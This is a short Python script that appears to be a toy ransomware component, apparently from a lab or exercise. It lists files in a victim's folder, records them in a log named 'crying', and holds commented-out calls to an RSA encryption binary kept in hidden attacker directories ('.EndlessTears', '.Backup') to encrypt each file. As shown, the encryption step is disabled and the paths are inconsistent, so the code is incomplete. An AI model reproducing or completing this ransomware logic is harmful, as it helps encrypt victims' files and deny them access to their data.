#!/usr/bin/env python

import os,subprocess

def main():
    files = os.listdir('/home/victim/Desktop/attackDesktop')
    encrypted = []
    try:
        f = open("/home/victim/Documents/crying",'r+')
        encrypted = [line.strip() for line in f.readlines()]
    except FileNotFoundError:
        f = open("/home/victim/Documents/crying",'w')
    for file in files:
        if file not in encrypted:
            """
            try:
                subprocess.call(['/home/attacker/Public/.EndlessTears/RSA_Encrypt','-C','126419','30743','/home/attacker/Desktop/' + file])
            except FileNotFoundError:
                subprocess.call(['/home/attacker/Desktop/.Backup/RSA_Encrypt','-C','126419','30743','/home/attacker/Desktop/' + file])
            """
            f.write(file + '\n')
    f.close()

if __name__ == '__main__':
    main()
